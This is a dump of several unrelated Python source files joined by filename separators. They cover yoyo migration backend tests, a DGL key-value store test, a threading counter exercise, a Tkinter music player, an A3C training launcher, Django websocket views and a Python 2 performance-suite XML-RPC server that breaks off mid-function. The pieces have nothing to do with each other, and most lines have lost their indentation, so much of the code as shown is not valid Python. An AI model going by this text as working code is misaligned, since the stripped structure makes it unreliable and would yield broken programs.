assert rows == [("A",), ("C",)]
def test_backend_detects_transactional_ddl(self, backend):
expected = {
backends.PostgresqlBackend: True,
backends.SQLiteBackend: True,
backends.MySQLBackend: False,
}
if backend.__class__ in expected:
assert backend.has_transactional_ddl is expected[backend.__class__]
def test_non_transactional_ddl_behaviour(self, backend):
"""
DDL queries in MySQL commit the current transaction,
but it still seems to respect a subsequent rollback.
We don't rely on this behaviour, but it's weird and worth having
a test to document how it works and flag up in future should a new
backend do things differently
"""
if backend.has_transactional_ddl:
return
with backend.transaction() as trans:
backend.execute("CREATE TABLE yoyo_a (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_a VALUES (1)")
backend.execute("CREATE TABLE yoyo_b (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_b VALUES (1)")
trans.rollback()
count_a = backend.execute("SELECT COUNT(1) FROM yoyo_a").fetchall()[0][
0
]
assert count_a == 1
count_b = backend.execute("SELECT COUNT(1) FROM yoyo_b").fetchall()[0][
0
]
assert count_b == 0
@with_migrations(
a="""
__transactional__ = False
step('CREATE DATABASE yoyo_test_tmp',
'DROP DATABASE yoyo_test_tmp',
)
"""
)
def test_statements_requiring_no_transaction(self, tmpdir):
"""
PostgreSQL will error if certain statements (eg CREATE DATABASE)
are run within a transaction block.
As far as I know this behavior is PostgreSQL specific. We can't run
this test in sqlite or oracle as they do not support CREATE DATABASE.
"""
for backend in get_test_backends(exclude={"sqlite", "oracle"}):
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
backend.rollback_migrations(migrations)
@with_migrations(
a="""
__transactional__ = False
def reopen_db(conn):
import sqlite3
for _, db, filename in conn.execute('PRAGMA database_list'):
if db == 'main':
reconn = sqlite3.connect(filename)
reconn.execute("CREATE TABLE yoyo_test_b (id int)")
break
else:
raise AssertionError("sqlite main database not found")
step('CREATE TABLE yoyo_test_a (id int)')
step(reopen_db)
step('CREATE TABLE yoyo_test_c (id int)')
"""
)
def test_disabling_transactions_in_sqlite(self, tmpdir):
"""
Transactions cause sqlite databases to become locked, preventing
other tools from accessing them:
https://bitbucket.org/ollyc/yoyo/issues/43/run-step-outside-of-transaction
"""
with NamedTemporaryFile() as tmp:
backend = get_backend("sqlite:///" + tmp.name)
backend.apply_migrations(read_migrations(tmpdir))
assert "yoyo_test_a" in backend.list_tables()
assert "yoyo_test_b" in backend.list_tables()
assert "yoyo_test_c" in backend.list_tables()
class TestConcurrency(object):
# How long to lock for: long enough to allow a migration to be loaded and
# started without unduly slowing down the test suite
lock_duration = 0.3
def do_something_with_lock(self, dburi):
with get_backend(dburi).lock():
time.sleep(self.lock_duration)
def skip_if_not_concurrency_safe(self, backend):
if (
"sqlite" in backend.uri.scheme
and backend.uri.database == ":memory:"
):
pytest.skip(
"Concurrency tests not supported for SQLite "
"in-memory databases, which cannot be shared "
"between threads"
)
if backend.driver.threadsafety < 1:
pytest.skip(
"Concurrency tests not supported for "
"non-threadsafe backends"
)
def test_lock(self, dburi):
"""
Test that :meth:`~yoyo.backends.DatabaseBackend.lock`
acquires an exclusive lock
"""
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
t = time.time()
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with backend.lock():
delta = time.time() - t
assert delta >= self.lock_duration
thread.join()
def test_lock_times_out(self, dburi):
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with pytest.raises(exceptions.LockTimeout):
with backend.lock(timeout=0.001):
assert False, "Execution should never reach this point"
thread.join()
class TestInitConnection(object):
class MockBackend(backends.DatabaseBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
def list_tables(self):
return []
def connect(self, dburi):
return Mock()
def test_it_calls_init_connection(self):
with patch("yoyo.internalmigrations.upgrade"), patch.object(
self.MockBackend, "init_connection", Mock()
) as mock_init:
backend = self.MockBackend("", "")
connection = backend.connection
assert mock_init.call_args == call(connection)
mock_init.reset_mock()
backend.rollback()
assert mock_init.call_args_list == [call(connection)]
def test_postgresql_backend_sets_search_path(self):
class MockPGBackend(backends.PostgresqlBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
schema = "foo"
def connect(self, dburi):
return Mock()
with patch("yoyo.internalmigrations.upgrade"):
backend = MockPGBackend("", "")
backend.rollback()
assert backend.connection.cursor().execute.call_args == call(
"SET search_path TO foo"
)
def test_postgresql_connects_with_schema(self):
dburi = next(iter(get_test_dburis(only={"postgresql"})), None)
if dburi is None:
pytest.skip("PostgreSQL backend not available")
backend = get_backend(dburi)
with backend.transaction():
backend.execute("CREATE SCHEMA foo")
try:
assert get_backend(dburi + "?schema=foo").execute(
"SHOW search_path"
).fetchone() == ("foo",)
finally:
with backend.transaction():
backend.execute("DROP SCHEMA foo CASCADE")
def test_postgresql_list_table_uses_current_schema(self):
dburi = next(iter(get_test_dburis(only={"postgresql"})), None)
if dburi is None:
pytest.skip("PostgreSQL backend not available")
backend = get_backend(dburi)
dbname = backend.uri.database
with backend.transaction():
backend.execute(
"ALTER DATABASE {} SET SEARCH_PATH = custom_schema,public".format(
dbname
)
)
try:
with backend.transaction():
backend.execute("CREATE SCHEMA custom_schema")
backend.execute("CREATE TABLE custom_schema.foo (x int)")
assert "foo" in get_backend(dburi).list_tables()
finally:
with backend.transaction():
backend.execute(
"ALTER DATABASE {} RESET SEARCH_PATH".format(dbname)
)
backend.execute("DROP SCHEMA custom_schema CASCADE")
|
test_kvstore.py
|
import dgl
import argparse
import mxnet as mx
import time
import backend as F
from multiprocessing import Process
ID = []
ID.append(mx.nd.array([0,1], dtype='int64'))
ID.append(mx.nd.array([2,3], dtype='int64'))
ID.append(mx.nd.array([4,5], dtype='int64'))
ID.append(mx.nd.array([6,7], dtype='int64'))
DATA = []
DATA.append(mx.nd.array([[1.,1.,1.,],[1.,1.,1.,]]))
DATA.append(mx.nd.array([[2.,2.,2.,],[2.,2.,2.,]]))
DATA.append(mx.nd.array([[3.,3.,3.,],[3.,3.,3.,]]))
DATA.append(mx.nd.array([[4.,4.,4.,],[4.,4.,4.,]]))
edata_partition_book = {'edata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
ndata_partition_book = {'ndata':mx.nd.array([0,0,1,1,2,2,3,3], dtype='int64')}
ndata_g2l = []
edata_g2l = []
ndata_g2l.append({'ndata':mx.nd.array([0,1,0,0,0,0,0,0], dtype='int64')})
ndata_g2l.append({'ndata':mx.nd.array([0,0,0,1,0,0,0,0], dtype='int64')})
ndata_g2l.append({'ndata':mx.nd.array([0,0,0,0,0,1,0,0], dtype='int64')})
ndata_g2l.append({'ndata':mx.nd.array([0,0,0,0,0,0,0,1], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,1,0,0,0,0,0,0], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,0,0,1,0,0,0,0], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,0,0,0,0,1,0,0], dtype='int64')})
edata_g2l.append({'edata':mx.nd.array([0,0,0,0,0,0,0,1], dtype='int64')})
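# Interpretation (not stated in the original file): the *_partition_book arrays map each
# global id to the server that owns it, and the *_g2l arrays map a global id to its local
# row on that server, e.g. global ids 2 and 3 live on server 1 at local rows 0 and 1.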
def start_client(flag):
time.sleep(3)
client = dgl.contrib.start_client(ip_config='ip_config.txt',
ndata_partition_book=ndata_partition_book,
edata_partition_book=edata_partition_book,
close_shared_mem=flag)
client.push(name='edata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.push(name='ndata', id_tensor=ID[client.get_id()], data_tensor=DATA[client.get_id()])
client.barrier()
tensor_edata = client.pull(name='edata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
tensor_ndata = client.pull(name='ndata', id_tensor=mx.nd.array([0,1,2,3,4,5,6,7], dtype='int64'))
target_tensor = mx.nd.array([[1., 1., 1.],
[1., 1., 1.],
[2., 2., 2.],
[2., 2., 2.],
[3., 3., 3.],
[3., 3., 3.],
[4., 4., 4.],
[4., 4., 4.]])
assert F.array_equal(tensor_edata, target_tensor)
assert F.array_equal(tensor_ndata, target_tensor)
client.barrier()
if client.get_id() == 0:
client.shut_down()
def start_server(server_id, num_client):
dgl.contrib.start_server(
server_id=server_id,
ip_config='ip_config.txt',
num_client=num_client,
ndata={'ndata':mx.nd.array([[0.,0.,0.],[0.,0.,0.]])},
edata={'edata':mx.nd.array([[0.,0.,0.],[0.,0.,0.]])},
ndata_g2l=ndata_g2l[server_id],
edata_g2l=edata_g2l[server_id])
if __name__ == '__main__':
# server process
p0 = Process(target=start_server, args=(0, 4))
p1 = Process(target=start_server, args=(1, 4))
p2 = Process(target=start_server, args=(2, 4))
p3 = Process(target=start_server, args=(3, 4))
# client process
p4 = Process(target=start_client, args=(True,))
p5 = Process(target=start_client, args=(True,))
p6 = Process(target=start_client, args=(False,))
p7 = Process(target=start_client, args=(False,))
# start server process
p0.start()
p1.start()
p2.start()
p3.start()
# start client process
p4.start()
p5.start()
p6.start()
p7.start()
p0.join()
p1.join()
p2.join()
p3.join()
p4.join()
p5.join()
p6.join()
p7.join()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
import time
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
    for a in range(1000000):
i = i + 1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
    for a in range(1000000):
i = i - 1
def main():
# TODO: Something is missing here (needed to print i)
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
#time.sleep(1)
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
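# A minimal sketch (not part of the original exercise, and not called anywhere) showing
# one way to remove the data race: protect every read-modify-write of the shared counter
# with a Lock. The names lock_demo and counter_lock are illustrative only.
from threading import Lock

counter_lock = Lock()

def lock_demo():
    total = {"value": 0}
    def up():
        for _ in range(1000000):
            with counter_lock:
                total["value"] += 1
    def down():
        for _ in range(1000000):
            with counter_lock:
                total["value"] -= 1
    t1, t2 = Thread(target=up), Thread(target=down)
    t1.start(); t2.start()
    t1.join(); t2.join()
    return total["value"]  # always 0, because the lock serialises the updates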
|
basic.py
|
import os
import threading
import time
from tkinter import *
import tkinter.messagebox
from pygame import mixer
from tkinter import filedialog
from mutagen.mp3 import MP3
from ttkthemes import themed_tk as tk
from tkinter import ttk
root = tk.ThemedTk()
root.get_themes()
root.set_theme("radiance")
statusbar = Label(root, text="This is a Music Player: Rhythm", relief=SUNKEN,font="Times 10 bold")
statusbar.pack(side=BOTTOM, fill=X)
menubar = Menu(root)
root.config(menu=menubar)
subMenu = Menu(menubar,tearoff=0)
playlist = []
paused = FALSE
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index,filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
    tkinter.messagebox.showinfo('About Rhythm', 'This is a music player built using Python Tkinter')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us",command=about_us)
mixer.init()
root.title("Rhythm")
root.iconbitmap(r'images/music.ico')
leftframe = Frame(root)
leftframe.pack(side = LEFT,padx=30,pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del",command = del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = Label(topframe, text='Total length = --:--')
lengthlabel.pack(pady=10)
currenttimelabel = Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
# div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
# mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
# Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
        if paused:
            time.sleep(1)
            continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Rhythm could not find the file. Please check again.')
def stop_music():
    global paused
    mixer.music.stop()
    statusbar["text"] = "Music Stopped"
    paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
    # set_volume of mixer takes values only from 0 to 1. Example: 0, 0.1, 0.55, 0.99, 1
muted = FALSE
def mute_music():
global muted
if muted: # Unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
else: # mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30,padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0,column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0,column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0,column=2, padx=10)
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0,column=0,padx=15)
mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70)
mixer.music.set_volume(0.7)
scale.grid(row=0,column=2,pady=15,padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
main.py
|
from __future__ import print_function
import argparse
import os
import json
import torch
import torch.multiprocessing as mp
import numpy as np
import optim
from envs import create_atari_env
from model import ActorCritic
from evaluation import evaluation
from train import train
def parse_arg():
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--entropy', type=float, default=0.001)
parser.add_argument('--value-loss', type=float, default=0.5)
parser.add_argument('--seed', type=int, default=2)
parser.add_argument('--num-processes', type=int, default=4)
parser.add_argument('--num-steps', type=int, default=20)
parser.add_argument('--max-episode-length', type=int, default=1000000)
parser.add_argument('--num-episodes', type=int, default=200)
parser.add_argument('--env-name', default='PongDeterministic-v4')
parser.add_argument('--no-shared', default=False)
parser.add_argument('--use-sn-critic', default=False, type=bool)
parser.add_argument('--use-sn-actor', default=False, type=bool)
parser.add_argument('--use-sn-shared', default=False, type=bool)
parser.add_argument('--depth-actor', default=0, type=int)
parser.add_argument('--depth-critic', default=0, type=int)
parser.add_argument('--use-visdom', default=False, type=bool)
parser.add_argument('--server', help='Visdom server')
parser.add_argument('--port', help='Visdom port')
parser.add_argument('--exp-name', default='main')
parser.add_argument('--root-path', default='.')
return parser.parse_args()
def prepare_save_path(args):
if not os.path.isdir(args.save_path):
print('%s did not exist. Creating it' % args.save_path)
os.makedirs(args.save_path)
os.makedirs(args.model_path, exist_ok=True)
class MockVisdom():
def text(self, *args, **kwargs):
pass
def line(self, *args, **kwargs):
pass
def histogram(self, *args, **kwargs):
pass
if __name__ == '__main__':
args = parse_arg()
args.save_path = os.path.join(args.root_path, args.exp_name)
args.model_path = os.path.join(args.save_path, 'model')
if args.use_visdom:
import visdom
vis = visdom.Visdom(server=args.server, port=args.port, env=args.exp_name)
else:
vis = MockVisdom()
vis.text(repr(args), win='args')
prepare_save_path(args)
json.dump(vars(args), open(os.path.join(args.save_path, 'args.json'), 'w'))
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space, args.use_sn_critic, args.use_sn_actor,
args.use_sn_shared, args.depth_actor, args.depth_critic)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
# mp.set_start_method('spawn')
counter = mp.Value('i', 0)
n_episodes = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=evaluation, args=(args.num_processes, args, shared_model, counter, n_episodes, vis, optimizer))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, n_episodes, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
views.py
|
from django.shortcuts import render
# Create your views here.
from dwebsocket.decorators import accept_websocket, require_websocket
from django.http import HttpResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from DjangoRestAuth.publicApi import DocParam, get_parameter_dic,tid_maker, RedisHelper
from train_net.tasks import start_running
import time,json
from django.conf import settings
from django.core.cache import cache
@accept_websocket
def echo_once(request,executionId):
    if not request.is_websocket():  # check whether this is a websocket connection
        try:  # handle it as a plain HTTP request
message = request.GET['message']
return HttpResponse(message)
except:
return render(request, 'index.html')
else:
while True:
# for message in request.websocket:
            # message = message.decode('utf-8')  # receive the data sent by the frontend
            # print(message)
            # print('websocket request received')
print('executionId=======',executionId)
obj = RedisHelper(executionId)
redis_sub = obj.subscribe()
msg = redis_sub.parse_response()
if type(msg[2]) == bytes:
msg = msg[2].decode()
print(msg+'--==')
msg = json.loads(msg.replace("'", '"'))
msg = json.dumps(msg, ensure_ascii=False).encode('utf-8')
message = msg
print(message)
request.websocket.send(message)
import threading
class run_neural_net(APIView):
'''
    Train the neural network.
'''
coreapi_fields = (
DocParam("epoch_range", description='轮询次数', required=True),#10
DocParam("lr", description='浮点'),#0.01
)
def post(self, request, *args, **kwargs):
epoch_range = get_parameter_dic(request)['epoch_range']
lr = get_parameter_dic(request)['lr']
task_id = tid_maker()
run = threading.Thread(target=start_running, args=(task_id,lr,epoch_range))
run.start()
# start_running.delay(lr,epoch_range)
return Response({"executionId": task_id})
|
cmsPerfServer.py
|
#!/usr/bin/env python
import cmsPerfPublish as cspp
import cmsPerfSuite as cps
import cmsPerfHarvest as cph
#G.Benelli
import cmsRelValCmd #Module that contains get_cmsDriverOptions() function to get a string with the options we are interested in from cmsDriver_highstats_hlt.txt
import cmsCpuInfo #Module that contains get_NumOfCores() function to get an integer with the number of cores on the current machine (through parsing /proc/cpuinfo)
from cmsPerfCommons import Candles
import optparse as opt
import socket, os, sys, SimpleXMLRPCServer, threading, exceptions
CandlesString=""
for candle in Candles:
CandlesString=CandlesString+","+candle
print CandlesString[1:]
_outputdir = os.getcwd()
_reqnumber = 0
_logreturn = False
_PROG_NAME = os.path.basename(sys.argv[0])
_CASTOR_DIR = "/castor/cern.ch/cms/store/relval/performance/"
_DEFAULTS = {"castordir" : _CASTOR_DIR,
"perfsuitedir" : os.getcwd(),
"TimeSizeEvents" : 100 ,
"TimeSizeCandles" : "",
"TimeSizePUCandles" : "",
"IgProfEvents" : 0 ,
"IgProfCandles" : "" ,
"IgProfPUCandles" : "" ,
"CallgrindEvents" : 0 ,
"CallgrindCandles" : "" ,
"CallgrindPUCandles" : "" ,
"MemcheckEvents" : 0 ,
"MemcheckCandles" : "" ,
"MemcheckPUCandles" : "" ,
"cmsScimark" : 10 ,
"cmsScimarkLarge" : 10 ,
"cmsdriverOptions" : cmsRelValCmd.get_cmsDriverOptions(), #Get these options automatically now!
"stepOptions" : "" ,
"quicktest" : False ,
"profilers" : "" ,
"cpus" : "1" ,
"cores" : cmsCpuInfo.get_NumOfCores(), #Get this option automatically
"prevrel" : "" ,
"isAllCandles" : True ,
#"candles" : CandlesString[1:] ,
"bypasshlt" : False ,
"runonspare" : True ,
"logfile" : os.path.join(os.getcwd(),"cmsPerfSuite.log")}
def optionparse():
global _outputdir
parser = opt.OptionParser(usage=("""%s [Options]""" % _PROG_NAME))
parser.add_option('-p',
'--port',
type="int",
dest='port',
default=8000, #Setting the default port to be 8000
help='Run server on a particular port',
metavar='<PORT>',
)
parser.add_option('-o',
'--output',
type="string",
dest='outputdir',
default="",
help='The output directory for all the cmsPerfSuite runs',
metavar='<DIR>',
)
(options, args) = parser.parse_args()
if not options.outputdir == "":
options.outputdir = os.path.abspath(options.outputdir)
if not os.path.exists(options.outputdir):
parser.error("the specified output directory %s does not exist" % options.outputdir)
sys.exit()
#This seems misleading naming _DEFAULTS, while we are re-initializing its keys to different values as we go...
_DEFAULTS["perfsuitedir"] = options.outputdir
#resetting global variable _outputdir too... do we really need this variable?
_outputdir = options.outputdir
return (options.port,options.outputdir)
#class ClientThread(threading.Thread):
# Overloading the constructor to accept cmsPerfSuite parameters
def runserv(port):
# Remember that localhost is the loopback network: it does not provide
# or require any connection to the outside world. As such it is useful
# for testing purposes. If you want your server to be seen on other
    # machines, you must use your real network address instead of
# 'localhost'.
server = None
try:
server = SimpleXMLRPCServer.SimpleXMLRPCServer((socket.gethostname(),port))
server.register_function(request_benchmark)
except socket.error as detail:
print "ERROR: Could not initialise server:", detail
sys.stdout.flush()
sys.exit()
print "Running server on port %s... " % port
sys.stdout.flush()
while True:
try:
server.handle_request()
sys.stdout.flush()
except (KeyboardInterrupt, SystemExit):
#cleanup
server.server_close()
raise
except:
#cleanup
server.server_close()
raise
server.server_close()
#Not sure about this unused function:
#Probably left over from first server implementation tests
#def runcmd(cmd):
# process = os.popen(cmd)
# cmdout = process.read()
# exitstat = process.close()
#
# if True:
# print cmd
# print cmdout
#
# if not exitstat == None:
# sig = exitstat >> 16 # Get the top 16 bits
# xstatus = exitstat & 0xffff # Mask out all bits except the bottom 16
# raise
# return cmdout
def readlog(logfile):
astr = ""
try:
for line in open(logfile,"r"):
astr += line
except (OSError, IOError) as detail:
print detail
return astr
def getCPSkeyword(key,dict):
if key in dict:
return dict[key]
else:
return _DEFAULTS[key]
def request_benchmark(cmds):
#This is the function with which the server listens on the given port
#cmds is a list of dictionaries: each dictionary is a set of cmsPerfSuite commands to run.
#Most common use will be only 1 dictionary, but for testing with reproducibility and statistical errors
#one can easily think of sending the same command 10 times for example and then compare the outputs
global _outputdir, _reqnumber
print "Commands received running perfsuite for these jobs:"
print cmds
sys.stdout.flush()
try:
# input is a list of dictionaries each defining the
# keywords to cmsperfsuite
outs = []
cmd_num = 0
exists = True
#Funky way to make sure we create a directory request_n with n = serial request number (if the server is running for a while
#and the client submits more than one request
#This should never happen since _reqnumber is a global variable on the server side...
while exists:
topdir = os.path.join(_outputdir,"request_" + str(_reqnumber))
exists = os.path.exists(topdir)
_reqnumber += 1
os.mkdir(topdir)
#Going through each command dictionary in the cmds list (usually only 1 such dictionary):
for cmd in cmds:
curperfdir = os.path.abspath(os.path.join(topdir,str(cmd_num)))
if not os.path.exists(curperfdir):
os.mkdir(curperfdir)
logfile = os.path.join(curperfdir, "cmsPerfSuite.log")
if os.path.exists(logfile):
logfile = logfile + str(cmd_num)
print cmd
if 'cpus' in cmd:
if cmd['cpus'] == "All":
print "Running performance suite on all CPUS!\n"
cmd['cpus']=""
for cpu in range(cmsCpuInfo.get_NumOfCores()):
cmd["cpus"]=cmd["cpus"]+str(cpu)+","
cmd["cpus"]=cmd["cpus"][:-1] #eliminate the last comma for cleanliness
print "I.e. on cpus %s\n"%cmd["cpus"]
#Not sure this is the most elegant solution... we keep cloning dictionaries...
cmdwdefs = {}
cmdwdefs["castordir" ] = getCPSkeyword("castordir" , cmd)
cmdwdefs["perfsuitedir" ] = curperfdir
cmdwdefs["TimeSizeEvents" ] = getCPSkeyword("TimeSizeEvents" , cmd)
cmdwdefs["TimeSizeCandles" ] = getCPSkeyword("TimeSizeCandles" , cmd)
cmdwdefs["TimeSizePUCandles" ] = getCPSkeyword("TimeSizePUCandles" , cmd)
cmdwdefs["IgProfEvents" ] = getCPSkeyword("IgProfEvents" , cmd)
cmdwdefs["IgProfCandles" ] = getCPSkeyword("IgProfCandles" , cmd)
cmdwdefs["IgProfPUCandles" ] = getCPSkeyword("IgProfPUCandles" , cmd)
cmdwdefs["CallgrindEvents" ] = getCPSkeyword("CallgrindEvents" , cmd)
cmdwdefs["CallgrindCandles"] = getCPSkeyword("CallgrindCandles" , cmd)
cmdwdefs["CallgrindPUCandles"] = getCPSkeyword("CallgrindPUCandles" , cmd)
cmdwdefs["MemcheckEvents" ] = getCPSkeyword("MemcheckEvents" , cmd)
cmdwdefs["MemcheckCandles" ] = getCPSkeyword("MemcheckCandles" , cmd)
cmdwdefs["MemcheckPUCandles" ] = getCPSkeyword("MemcheckPUCandles" , cmd)
cmdwdefs["cmsScimark" ] = getCPSkeyword("cmsScimark" , cmd)
cmdwdefs["cmsScimarkLarge" ] = getCPSkeyword("cmsScimarkLarge" , cmd)
cmdwdefs["cmsdriverOptions"] = getCPSkeyword("cmsdriverOptions", cmd)
cmdwdefs["stepOptions" ] = getCPSkeyword("stepOptions" , cmd)
cmdwdefs["quicktest" ] = getCPSkeyword("quicktest" , cmd)
cmdwdefs["profilers" ] = getCPSkeyword("profilers" , cmd)
cmdwdefs["cpus" ] = getCPSkeyword("cpus" , cmd)
cmdwdefs["cores" ] = getCPSkeyword("cores" , cmd)
cmdwdefs["prevrel" ] = getCPSkeyword("prevrel" , cmd)
# cmdwdefs["candles" ] = getCPSkeyword("candles" , cmd)
# cmdwdefs["isAllCandles" ] = len(Candles) == len(cmdwdefs["candles"]) #Dangerous: in the _DEFAULTS version this is a boolean!
cmdwdefs["bypasshlt" ] = getCPSkeyword("bypasshlt" , cmd)
cmdwdefs["runonspare" ] = getCPSkeyword("runonspare" , cmd)
cmdwdefs["logfile" ] = logfile
logh = open(logfile,"w")
logh.write("This perfsuite run was configured with the following options:\n")
#logh.write(str(cmdwdefs) + "\n")
for key in cmdwdefs.keys():
logh.write(key + "\t" +str(cmdwdefs[key])+"\n")
logh.close()
print "Calling cmsPerfSuite.main() function\n"
cpsInputArgs=[
#"-a",cmdwdefs["castordir"],
"-t",cmdwdefs["TimeSizeEvents" ],
"--RunTimeSize",cmdwdefs["TimeSizeCandles"],
"-o",cmdwdefs["perfsuitedir" ],
#"-i",cmdwdefs["IgProfEvents" ],
#"--RunIgProf",cmdwdefs["RunIgProf" ],
#"-c",cmdwdefs["CallgrindEvents" ],
#"--RunCallgrind",cmdwdefs["RunCallgrind" ],
#"-m",cmdwdefs["MemcheckEvents"],
#"--RunMemcheck",cmdwdefs["RunMemcheck"],
"--cmsScimark",cmdwdefs["cmsScimark" ],
"--cmsScimarkLarge",cmdwdefs["cmsScimarkLarge" ],
"--cmsdriver",cmdwdefs["cmsdriverOptions"],
"--step",cmdwdefs["stepOptions" ],
#"--quicktest",cmdwdefs["quicktest" ],
#"--profile",cmdwdefs["profilers" ],
"--cpu",cmdwdefs["cpus" ],
"--cores",cmdwdefs["cores" ],
#"--prevrel",cmdwdefs["prevrel" ],
# "--candle",cmdwdefs["candles" ],
#"--bypass-hlt",cmdwdefs["bypasshlt" ],
"--notrunspare"#,cmdwdefs["runonspare" ]#,
#"--logfile",cmdwdefs["logfile" ]
]
print cpsInputArgs
cps.main(cpsInputArgs)
print "Running of the Performance Suite is done!"
#logreturn is false... so this does not get executed
#Maybe we can replace this so that we can have more verbose logging of the server activity
if _logreturn:
outs.append(readlog(logfile))
else:
outs.append((cmdwdefs,cph.harvest(curperfdir)))
#incrementing the variable for the command number:
cmd_num += 1
return outs #Not sure what James intended to return here... the contents of all logfiles in a list of logfiles?
except exceptions.Exception as detail:
# wrap the entire function in try except so we can log the error at client and server
logh = open(os.path.join(os.getcwd(),"error.log"),"a")
logh.write(str(detail) + "\n")
logh.flush()
logh.close()
print detail
sys.stdout.flush()
raise
def _main():
print _DEFAULTS
(port, outputdir) = optionparse()
